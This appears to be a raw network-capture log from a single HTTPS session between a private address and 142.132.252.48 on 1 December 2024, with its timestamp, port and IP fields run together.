                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.849405050 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.849447012 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.854346037 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.854362965 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.854450941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.854456902 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.854499102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859843016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859865904 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859905005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859911919 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859939098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.859950066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.865369081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.865386009 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.865454912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.865463018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.865514040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870388031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870407104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870449066 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870462894 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870480061 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.870492935 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.876039028 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.876055002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.876112938 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.876120090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.876157045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.881675005 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.881690979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.881742001 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.881747961 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.881789923 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886888981 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886905909 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886945009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886950970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886976004 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.886990070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:57.981781006 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.010953903 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.050374031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.050395966 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.050465107 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.050473928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.050518990 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.055329084 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.055345058 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.055392981 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.055398941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.055438042 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061012983 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061029911 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061079025 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061084986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061094999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.061121941 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.066646099 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.066662073 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.066724062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.066730022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.066768885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071680069 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071700096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071751118 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071758986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071801901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.071801901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077363014 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077378988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077439070 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077447891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077471018 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.077492952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.082971096 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.082988024 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.083067894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.083067894 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.083076000 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.083117962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088669062 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088687897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088736057 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088741064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088795900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.088795900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.155985117 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251770973 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251792908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251843929 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251854897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251868010 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.251904964 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257292986 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257309914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257374048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257374048 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257385969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.257456064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.262193918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.262212038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.262270927 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.262279034 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.262403011 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267673969 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267692089 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267769098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267769098 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267777920 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.267839909 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.273389101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.273427010 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.273526907 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.273535013 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.273650885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.278302908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.278317928 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.278393030 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.278407097 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.278450966 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.284106970 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.284123898 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.284203053 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.284224033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.284297943 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.289689064 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.289705038 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.289779902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.289788008 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.289834023 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.316864967 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.452948093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.452972889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.453174114 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.453185081 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.453250885 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.458128929 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.458146095 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.458250999 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.458259106 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.458314896 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.463639975 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.463655949 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.463712931 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.463718891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.463768005 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.469263077 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.469288111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.469350100 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.469372988 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.469443083 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.474972963 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.474996090 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.475100040 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.475114107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.475244045 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.479984045 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.480010033 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.480398893 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.480407953 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.480560064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.485549927 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.485567093 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.485996962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.485996962 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.486002922 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.486484051 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.491276026 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.491298914 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.491394043 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.491400957 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.491463900 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.511439085 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.654323101 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.654347897 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.654536009 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.654546022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.654612064 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.660042048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.660058022 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.660125971 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.660132885 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.660188913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.664959908 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.664975882 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.665033102 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.665040016 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.665128946 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.670541048 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.670557976 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.670600891 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.670618057 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.670680046 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.676246881 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.676263094 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.676363945 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.676383018 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.676455021 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.681332111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.681349993 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.681406975 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.681413889 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.681494951 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.687031984 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.687050104 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.687110901 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.687118053 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.687180996 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.692565918 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.692581892 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.692643881 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.692651987 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.692698002 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.694660902 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.855504036 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.855530977 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.855676889 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.855690002 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.855887890 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.860806942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.860824108 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.860893965 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.860908031 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.860950947 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866444111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866458893 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866532087 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866539955 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866558075 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.866588116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872041941 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872059107 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872124910 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872131109 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872180939 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.872522116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877044916 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877068043 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877111912 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877118111 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877129078 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.877165079 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882751942 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882770061 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882864952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882864952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882874012 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.882920027 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.884885073 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888396978 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888417006 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888528109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888528109 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888542891 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.888587952 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.893394947 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.893409967 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.893480062 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.893502951 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.893563986 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:58.933442116 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.056709051 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.056730032 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.056922913 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.056936979 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.056999922 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.062057972 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.062077999 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.062164068 CET49721443192.168.2.6142.132.252.48
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.062172890 CET44349721142.132.252.48192.168.2.6
                                                                                                                                                                                                                                              Dec 1, 2024 10:37:59.062227964 CET49721443192.168.2.6142.132.252.48
